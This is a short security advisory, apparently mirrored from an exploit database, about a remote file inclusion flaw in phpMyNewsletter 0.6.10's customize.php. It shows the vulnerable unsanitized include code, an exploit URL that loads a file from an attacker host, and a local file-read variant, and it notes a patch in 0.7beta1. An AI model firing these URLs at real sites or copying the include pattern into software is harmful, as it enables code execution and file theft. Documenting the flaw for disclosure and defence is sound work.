Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16586
HistoryApr 05, 2007 - 12:00 a.m.

phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability:

2007-04-0500:00:00
vulners.com
22

Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
°°°°°°°°°°
---- /include/customize.php ----
<?
$langfile = $l;

include $l;
?>
---- /include/customize.php ----

Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=…/path/file/to/view

Patch :
°°°°°°°
Autor has been alerted and last version (0.7beta1) has been patched.

More details

frog-m@n

milw0rm.com [2007-04-04]